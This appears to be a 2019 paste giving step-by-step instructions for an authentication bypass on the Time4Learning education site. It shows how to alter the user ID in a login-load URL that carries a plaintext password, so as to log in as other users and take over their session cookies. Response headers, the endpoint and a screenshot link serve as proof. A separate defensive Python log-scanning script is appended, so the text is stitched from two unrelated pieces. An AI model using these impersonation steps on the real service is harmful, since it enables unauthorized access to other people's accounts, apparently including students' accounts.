deathslayer999

TimeForLearning Bypass Login

Nov 12th, 2019
TimeForLearning Login Vuln Found By N,
(EXPLAIN)
You have to be logged in to an account to grab the Header/Red,
but you don't have to be logged in to log in as someone else.

This can cause great harm, since a person could log in to their account, grab their SES ID from the cookies, and auto-login as that person.

First, send a GET request to: https://www.time4learning.com/App/Dashboards/Upper/#/courses

{HEADERS}
====================================================================
Tue, 12 Nov 2019 16:28:20 GMT
content-encoding: br
cf-cache-status: DYNAMIC
server: cloudflare
x-aspnet-version: 4.0.30319
access-control-allow-origin: *
x-powered-by:
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-pingback:
content-type: text/html; charset=utf-8
status: 200
cache-control: private
cf-ray: 5349e0e138dfec32-MFE
link:
x-ua-compatible: IE=11
===================================================================
(POC)

Once you see that, your body should pop up. Then look for this text:
http://www.time4learning.com/Login/Load_CompassLearning.aspx?u=&password=internet
You will have a PL ID for the username. Change the last 3 digits to something like 800,
and boom, you are logged in as someone else. Example:
EXAMPLE: https://imgur.com/Glu2eLt

Also, since you are logged in as someone else, you have their PL ID and the session cookie, so if you want to control their settings and such, just switch your cookies.
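
A defender-side check for the pattern described above, as an added example that is not part of the original paste: it scans web access logs for one client presenting several different `u` values to the login-load endpoint, and counts requests that carry a password in the URL. The log line format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Endpoint path comes from the paste; the log format below is an assumption.
LOGIN_PATH = "/login/load_compasslearning.aspx"
# Assumed line shape: <client-ip> <timestamp> "<METHOD> <url> HTTP/x.y"
LINE_RE = re.compile(r'^(\S+) (\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+"$')
# Constructed sample: documentation IP ranges and made-up account ids.
SAMPLE_LOG = """\
192.0.2.10 2019-11-12T16:28:20Z "GET /Login/Load_CompassLearning.aspx?u=ACCT-A101&password=REDACTED HTTP/1.1"
192.0.2.10 2019-11-12T16:28:31Z "GET /Login/Load_CompassLearning.aspx?u=ACCT-A102&password=REDACTED HTTP/1.1"
192.0.2.10 2019-11-12T16:28:40Z "GET /Login/Load_CompassLearning.aspx?u=ACCT-A103&password=REDACTED HTTP/1.1"
192.0.2.10 2019-11-12T16:28:52Z "GET /Login/Load_CompassLearning.aspx?u=ACCT-A104&password=REDACTED HTTP/1.1"
198.51.100.7 2019-11-12T16:30:02Z "GET /Login/Load_CompassLearning.aspx?u=ACCT-B555&password=REDACTED HTTP/1.1"
198.51.100.7 2019-11-12T16:30:09Z "GET /App/Dashboards/Upper/ HTTP/1.1"
203.0.113.4 2019-11-12T16:31:00Z "GET /Login/Load_CompassLearning.aspx?u=&password=REDACTED HTTP/1.1"
"""

def login_requests(log_text):
    """Yield (client_ip, query_dict) for each request to the login-load endpoint."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the assumed format
        ip, _timestamp, url = m.groups()
        parts = urlsplit(url)
        if parts.path.lower() == LOGIN_PATH:
            yield ip, parse_qs(parts.query)  # blank values (u=) are dropped

def clients_switching_accounts(log_text, max_accounts=2):
    """Map each client that presented more than max_accounts distinct u values
    to the sorted list of those values."""
    seen = defaultdict(set)
    for ip, query in login_requests(log_text):
        seen[ip].update(query.get("u", []))
    return {ip: sorted(u) for ip, u in seen.items() if len(u) > max_accounts}

def requests_with_password_in_url(log_text):
    """Count login-load requests whose URL carries a password parameter."""
    return sum(1 for _ip, query in login_requests(log_text) if "password" in query)

if __name__ == "__main__":
    print(clients_switching_accounts(SAMPLE_LOG))
    print(requests_with_password_in_url(SAMPLE_LOG))
```

The `max_accounts` threshold is a tuning assumption; shared networks such as schools or households can legitimately present several accounts from one address.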